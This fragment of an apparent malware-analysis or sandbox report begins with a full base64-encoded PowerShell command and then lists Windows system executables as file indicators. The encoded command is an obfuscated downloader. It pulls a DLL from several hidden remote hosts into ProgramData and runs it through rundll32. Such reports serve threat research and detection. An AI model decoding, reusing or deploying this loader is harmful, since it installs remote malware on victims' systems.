CAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA=" |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |